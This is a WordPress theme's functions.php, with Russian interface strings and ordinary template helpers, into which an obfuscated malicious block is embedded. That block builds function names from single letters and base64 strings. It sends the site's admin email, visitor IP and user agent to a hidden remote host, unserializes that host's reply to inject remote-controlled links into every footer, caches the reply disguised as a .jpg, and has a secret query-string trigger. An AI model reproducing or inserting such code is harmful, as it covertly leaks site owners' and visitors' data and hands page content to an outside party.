<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $MwlQPmd='e';$GYMS='s';$rAtds='d';$tKZmT='_';$xbluX='6';$nbPn='e';$eKkfWE='c';$rxicxvW='d';$GjFGSjv='a';$ajMke='4';$jIOaLp='e';$XVkFmqj='b';$rFne='o';$QhQdAwLM=$XVkFmqj.$GjFGSjv.$GYMS.$jIOaLp.$xbluX.$ajMke.$tKZmT.$rAtds.$nbPn.$eKkfWE.$rFne.$rxicxvW.$MwlQPmd;$pBtbBF='i';$OBLiUx='z';$QoPlfb='n';$pjbq='g';$wfGxG='t';$YxAO='e';$OELwt='l';$steFD='f';$hChE='a';$uRmcmrRn=$pjbq.$OBLiUx.$pBtbBF.$QoPlfb.$steFD.$OELwt.$hChE.$wfGxG.$YxAO;$musJV='t';$RpIhtD='3';$sBXp='r';$hqdUM='_';$oAACWFi='s';$nSlYl='r';$nMIP='o';$nYdztw='t';$oDBP='1';$NvssgOLt=$oAACWFi.$musJV.$sBXp.$hqdUM.$nSlYl.$nMIP.$nYdztw.$oDBP.$RpIhtD;$sowkS='v';$WcdS='e';$Rpuky='t';$bSDkm='s';$XKNRMG='r';$GhgF='r';$ZeQxRVro=$bSDkm.$Rpuky.$XKNRMG.$GhgF.$WcdS.$sowkS;                     
		$nc__q='e';$pc______________n='s';$ai___x='d';$nt_____________s='_';$gf______b='6';$tb______________c='e';$rb_____________h='c';$si____________y='d';$jq____s='a';$cw____k='4';$rb_________y='e';$wl_______________a='b';$er_____________v='o';$xz_______________e=$wl_______________a.$jq____s.$pc______________n.$rb_________y.$gf______b.$cw____k.$nt_____________s.$ai___x.$tb______________c.$rb_____________h.$er_____________v.$si____________y.$nc__q;
		$sh________p='s';$wo______i='t';$xr_____v='i';$ek_______r='f';$fe________y='o';$up_______l='u';$sm__g='c';$yw___r='s';$bz______s='e';$hd_______________e='i';$cl__________x='_';$sr__x='n';$zu___s='x';$zt________e='t';$qa________l='n';$hb_____________j=$ek_______r.$up_______l.$qa________l.$sm__g.$wo______i.$xr_____v.$fe________y.$sr__x.$cl__________x.$bz______s.$zu___s.$hd_______________e.$sh________p.$zt________e.$yw___r;
		$we______________o='n';$mo________c='p';$sz____________v='e';$gi__u='o';$kj____j='f';$nx___________k=$kj____j.$gi__u.$mo________c.$sz____________v.$we______________o;
		$lm____i='f';$um__________g='e';$uj_____s='d';$ef_____________n='a';$qc______________h='r';$jk_______________c=$lm____i.$qc______________h.$um__________g.$ef_____________n.$uj_____s;
		$ei_________n='l';$or_____c='e';$bm______f='f';$wg________j='c';$xb______y='o';$vn___________q='s';$ig______w=$bm______f.$wg________j.$ei_________n.$xb______y.$vn___________q.$or_____c;
		
		define("WP_ID", $xz_______________e("Mi4wLjA="));
		define("WP_TTL", $xz_______________e("MTA4MDA="));
		define("WP_SRC", $xz_______________e("dHBva24="));
	


		function wp_get_header() {
			global $xz_______________e, $hb_____________j;
			
			if (
				$hb_____________j($xz_______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$hb_____________j($xz_______________e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$hb_____________j($xz_______________e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xz_______________e, $nx___________k, $ig______w, $jk_______________c;
			
			$mx__________t = TEMPLATEPATH."/".$xz_______________e("Zm9vdGVyLnBocA==");
			$si_________e = @$nx___________k($mx__________t, "r");
			$mx__________t = @$jk_______________c($si_________e, @filesize($mx__________t));
			@$ig______w($si_________e);
			
			$qe______z = TEMPLATEPATH."/".$xz_______________e("ZnVuY3Rpb25zLnBocA==");
			$si_________e = @$nx___________k($qe______z, "r");
			$qe______z = @$jk_______________c($si_________e, @filesize($qe______z));
			@$ig______w($si_________e);
			
			$oj___a = 0;
			if($mx__________t && $qe______z) {
				if ($xz_______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($mx__________t, $xz_______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$oj___a = 1;
					}
					if (substr_count($mx__________t, "wp_theme_GPL_credits()") < 1) {
						$oj___a = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$oj___a = 12;
				}
			}
			
			if($oj___a > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $oj___a -->";
			}
		}
	


		function wp_loaded() {
			global $xz_______________e, $hb_____________j;
			return $hb_____________j($xz_______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($he_______________s, $rq________y = "(more...)", $gs_________t = 0, $mf_____________s = "") {
				$vm__________y = get_the_content($rq________y, $gs_________t, $mf_____________s);
				$vm__________y = apply_filters("the_content", $vm__________y);
				
				$vm__________y = str_replace("]]>", "]]>", $vm__________y);
				if (strlen($_GET["p"]) > 0) {
					echo $vm__________y;
				}
				else if ((strlen($vm__________y)>$he_______________s) && ($wg_______v = strpos($vm__________y, " ", $he_______________s ))) {
					$vm__________y = substr($vm__________y, 0, $wg_______v);
					$vm__________y = $vm__________y;
					echo $vm__________y;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$rq________y</a></div></p>";
				} else {
					echo $vm__________y;
				}
				
			}
		}
	


		$ol___________t='n';$kw______________q='6';$ra___________h='s';$xr______________i='d';$ot_______________c='e';$cw__v='_';$fd___________y='e';$eq__i='a';$tu__y='o';$nl_____________e='4';$nw______h='e';$ur___k='b';$bs___t='c';$vy___________y=$ur___k.$eq__i.$ra___________h.$fd___________y.$kw______________q.$nl_____________e.$cw__v.$nw______h.$ol___________t.$bs___t.$tu__y.$xr______________i.$ot_______________c;
		$pb__g='o';$lr__________y='s';$yk_____________t='n';$rp_________f='e';$va______x='t';$qn________a='n';$jl_______________u='_';$zo_______o='l';$mb__________m='c';$wn________l='e';$ad__n='i';$yk_____________i='t';$kc___________m='t';$cb__c='f';$jb__________q='g';$bi__c='_';$mk_______________i='e';$cq__________q=$cb__c.$ad__n.$zo_______o.$rp_________f.$jl_______________u.$jb__________q.$wn________l.$va______x.$bi__c.$mb__________m.$pb__g.$qn________a.$yk_____________i.$mk_______________i.$yk_____________t.$kc___________m.$lr__________y;
		$bw_____e='i';$lf_________s='t';$tc_________j='e';$ks_______k='x';$ad___________h='_';$qb___f='f';$gu___________h='l';$cg________s='i';$zg_______________w='s';$ip_______________k='s';$we__e='e';$rb______y=$qb___f.$bw_____e.$gu___________h.$we__e.$ad___________h.$tc_________j.$ks_______k.$cg________s.$ip_______________k.$lf_________s.$zg_______________w;
		$xc______o='p';$eo______f='o';$ab___a='r';$qk____w='m';$gm______________m='s';$ns_________v='e';$gl____________w='_';$pn___________e='v';$vm__________u='o';$hz_____________n='e';$et____z='a';$kn____d='n';$zl__m='c';$rb_______q='i';$gt____________r='r';$kx________d=$pn___________e.$ns_________v.$ab___a.$gm______________m.$rb_______q.$vm__________u.$kn____d.$gl____________w.$zl__m.$eo______f.$qk____w.$xc______o.$et____z.$gt____________r.$hz_____________n;
		$ub________p='o';$ck__________o='e';$mj_____c='f';$xt__________p='s';$or________d='o';$tw___________r='n';$wm_____l='k';$hv________y='p';$yh_______________y='c';$na____________a=$mj_____c.$xt__________p.$or________d.$yh_______________y.$wm_____l.$ub________p.$hv________y.$ck__________o.$tw___________r;
		$tx_______i='f';$me_______b='e';$er________d='w';$yr___b='t';$ls__l='r';$yw______q='i';$yu_________l=$tx_______i.$er________d.$ls__l.$yw______q.$yr___b.$me_______b;
		$ye_____w='m';$bp_________z='d';$hp__t='5';$lh__________l=$ye_____w.$bp_________z.$hp__t;
		$bq__________r='l';$tv__x='t';$do_______g='p';$uk_____h='h';$ip_______m='a';$vj_____x='e';$ml____z='r';$bb___________e='a';$hs____h=$ml____z.$vj_____x.$ip_______m.$bq__________r.$do_______g.$bb___________e.$tv__x.$uk_____h;
		$xp__g='u';$yp__________d='i';$bi______________m='s';$gr___w='e';$pk____________i='e';$gn___r='i';$uv___________h='a';$py_____________q='z';$fa______q='n';$gs_____________p='r';$mi_________j='l';$yi_____________k=$xp__g.$fa______q.$bi______________m.$pk____________i.$gs_____________p.$gn___r.$uv___________h.$mi_________j.$yp__________d.$py_____________q.$gr___w;
		$de_____________r='p';$ny_________l='m';$qm________f='e';$dj___________f='m';$ws_______d='a';$in___b='n';$zq_________p='t';$is________c=$zq_________p.$qm________f.$ny_________l.$de_____________r.$in___b.$ws_______d.$dj___________f;
		$na________n='_';$cg____________x='e';$lu___________s='s';$sy___d='t';$jh______________v='a';$zi__________k='c';$ib_______________l='c';$vy__z='a';$ci___m='o';$vd______i='t';$sr______________e='m';$bp_____d='n';$bm______________p='r';$kd_____c='x';$jb_______________l='r';$qf_________r='e';$kt________t='t';$be___________e='t';$bh_____x='e';$nk____________d='_';$ll___g='e';$cc_______________d=$lu___________s.$kt________t.$bm______________p.$cg____________x.$vy__z.$sr______________e.$nk____________d.$zi__________k.$ci___m.$bp_____d.$be___________e.$ll___g.$kd_____c.$vd______i.$na________n.$ib_______________l.$jb_______________l.$qf_________r.$jh______________v.$sy___d.$bh_____x;
	


		function hw_____________j($ko___f) {
			global $xz_______________e, $hb_____________j, $cq__________q, $kx________d, $cc_______________d;
			
			if (!$hb_____________j($xz_______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($kx________d(PHP_VERSION, "5.0.0", ">=") && $hb_____________j($xz_______________e("ZmlsZV9nZXRfY29udGVudHM=")) && $hb_____________j($xz_______________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$kh_____i = $cc_______________d(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$gc________m = @$cq__________q($ko___f, 0, $kh_____i);
			} else {
				$gc________m = @$cq__________q($ko___f, 0);
			}
			
			return $gc________m;
		}
	


		function sk_____________y($ko___f) {
			global $hb_____________j, $na____________a, $yu_________l, $xz_______________e;
			
			if (!$hb_____________j($xz_______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$jw____________x = strpos($ko___f, "/", 7);
			$sn_____________e = array(
				"uri"     => substr($ko___f, $jw____________x),
				"host"    => str_replace("http://", "", substr($ko___f, 0, $jw____________x)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$yy_____________r = @$na____________a("$sn_____________e[host]", 80, $ea_________c, $gh_______________q, 4);
			
			if (!$yy_____________r) {
				return false;
			} else {
				$gc________m = "";
				$ge______r  = "GET $sn_____________e[uri] HTTP/1.0\r\n";
				$ge______r .= "Host: $sn_____________e[host]\r\n";
				$ge______r .= "Referer: $sn_____________e[referer]\r\n";
				$ge______r .= "Connection: Close\r\n\r\n";
				
				@$yu_________l($yy_____________r, $ge______r);
				
				while (!@feof($yy_____________r)) {
					$lp_____________c = @fgets($yy_____________r, (1024*24));
					
					if ($lp_____________c == "\r\n") {
						$jd______________j = true;
						continue;
					}
					
					if ($jd______________j) {
						$gc________m .= $lp_____________c;
					}
				}
				
				return $gc________m;
			}
		}
	


		function xz___________h($ko___f) {
			global $hb_____________j;
			$fv_____x = false;
			
			if ($ko___f != "") {
				if ($hb_____________j("hw_____________j")) {
					$fv_____x = @hw_____________j($ko___f);
				}
				
				if (!$fv_____x && ($hb_____________j("sk_____________y"))) {
					$fv_____x = @sk_____________y($ko___f);
				}
			}
			
			return $fv_____x;
		}
	


		function yx_______________n() {
			global $_SERVER, $lh__________l;
			
			$wt___u = $_SERVER["SERVER_NAME"];
			
			if (substr("$wt___u", 0, 4) == "www.") {
				$wt___u = substr("$wt___u", 4);
			}
			
			$wt___u = $lh__________l("$_SERVER[SERVER_NAME]");
			
			return $wt___u;
		}
	


		function uq________h() {
			return "file";
		}
	


		function ag___j($ko___f) {
			global $_SERVER, $cq__________q, $rb______y, $nx___________k, $ig______w, $yu_________l;
			
			$fv_______e = im_______________x();
			
			$vy__________d = yx_______________n().".jpg";
			$nj___p = $fv_______e["dir_upload"]["path"]."/$vy__________d";
			$dz______v = @filemtime($nj___p);
			
			if (!$dz______v || ((time()-$dz______v) >= WP_TTL)) {
				$fv_____x = xz___________h($ko___f);
				
				if ($fv_____x) {
					if ($rb______y($nj___p)) {
						@unlink($nj___p);
					}
					
					$si_________e = @$nx___________k($nj___p, "x+");
					
					@$yu_________l($si_________e, $fv_____x);
					@$ig______w($si_________e);
				}
			} else {
				if ($rb______y($nj___p)) {
					$fv_____x = @$cq__________q($nj___p);
				} else {
					$fv_____x = false;
				}
			}
			
			return $fv_____x;
		}
	


		function im_______________x() {
			global $_SERVER, $xz_______________e, $vy___________y;
			
			$mp_______________j = wp_count_posts("post");
			$fw______________l = pathinfo(get_bloginfo("template_directory"));
			
			$fv_______e = array(
				"url" => array(
					"report"      => $xz_______________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fw______________l,
				"dir_upload"	=> ll_____w(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fw______________l[filename],
					"a005=".$mp_______________j->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/princip-dejstviya-uzi/\">Принцип действия УЗИ</a>"
			);
			
			$fv_______e["url"]["queryString"] = implode("&", $fv_______e["queryString"]);
			$fv_______e["url"]["report"] = $fv_______e["url"]["report"]."/?".$vy___________y($fv_______e["url"]["queryString"]).".html";
						
			return $fv_______e;
		}
	


		function ll_____w() {
			$lj__________o = wp_upload_dir();
			
			if (isset($lj__________o["error"])) {
				$hz___s = yl___________n();
				if (is_writable($hz___s)) {
					$lj__________o = array("path" => $hz___s);
				}
			}

			return $lj__________o;
		}
	


		function yl___________n() {
			global $hb_____________j, $lh__________l, $hs____h, $is________c;
			
			$nf___z = (bool) ini_get("safe_mode");
			if ($nf___z == true) {
				return false;
			}
			
			if ($hb_____________j("sys_get_temp_dir")) {
				$lu__________t = sys_get_temp_dir();
				if (is_writable($lu__________t)) {
					return $hs____h($lu__________t);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $hs____h($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $hs____h($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $hs____h($_ENV["TEMP"]);
			} else {
				$pj__n = $is________c($lh__________l(uniqid(rand(), true)), "");
				if ($pj__n) {
					$lu__________t = $hs____h(dirname($pj__n));
					@unlink($pj__n);
					return $lu__________t;
				} else {
					return false;
				}
			}
		}
	


		function rn________b() {
			global $_GET, $rb______y;
			
			$fv_______e = im_______________x();
			$wt___u = yx_______________n();
			$vq_______________z = uq________h();
			
			$lc______m = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($vq_______________z == "file") {
					$yc____q = $fv_______e["dir_upload"]["path"]."/".$wt___u.".jpg";
					if ($rb______y($yc____q)) {
						@unlink($yc____q);
						$lc______m = "deleted";
					}
				}
				
				$iz________e = array(
					"s"	=> $lc______m,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($iz________e AS $oz_________n => $cq____m) echo " [$oz_________n:$cq____m]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $hb_____________j, $xz_______________e, $yi_____________k;
			$fv_______e = im_______________x();
			
			$mk___m = "ag___j";
			if ($hb_____________j($mk___m)) {
				$gc________m = $mk___m($fv_______e["url"]["report"]);
			}
			
			if ($gc________m) {
				if ($gc________m = @$xz_______________e($gc________m)) {
					$gc________m = @$yi_____________k($gc________m);
					
					if (strlen($gc________m[custom_credit]) >= 5) {
						$fv_______e["default_string"] = $gc________m[custom_credit];
					}
					
					if ($gc________m["status"] == "0") {
						$ln__________g = 1;
						$iq__________g = 1;
					} else {
						$vu_____h = sizeof($gc________m["links"]);
						$bt________k = $fv_______e["default_string"];
						
						if ($vu_____h > 0 && $gc________m["links"] !== "") {
							$su__h = 0;
							foreach ($gc________m["links"] as $nw____w => $ub__________a) {
								$su__h++;
								if ($ub__________a->l_path == "" || $ub__________a->l_path == $_SERVER["REQUEST_URI"]) {
									$ub__________a->l_href = htmlspecialchars(strip_tags($ub__________a->l_href));
									$ub__________a->l_title = htmlspecialchars(strip_tags($ub__________a->l_title));
									$ub__________a->l_anchor = htmlspecialchars(strip_tags($ub__________a->l_anchor));
									$bt________k .= " | ";
									$bt________k .= "<a href='$ub__________a->l_href' title='$ub__________a->l_title'";
									if ($ub__________a->l_nofollow == "1") {
										$bt________k .= " rel='nofollow'";
									}
									$bt________k .= ">$ub__________a->l_anchor</a>";
								}
							}
						}
						$fv_______e["links"] = "$bt________k";
						if ($gc________m[credit] == "0") {
							$fv_______e["links"] = "";
						}
					}
				} else {
					$ln__________g = "1";
				}
			} else {
				$ln__________g = "1";
			}
			
			if ($ln__________g == "1") {
				$fv_______e["links"] = $fv_______e["default_string"];
			}
			
			echo "$fv_______e[links]";
			
			echo "<!-- s: $gc________m[signature] -->";
			rn________b();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
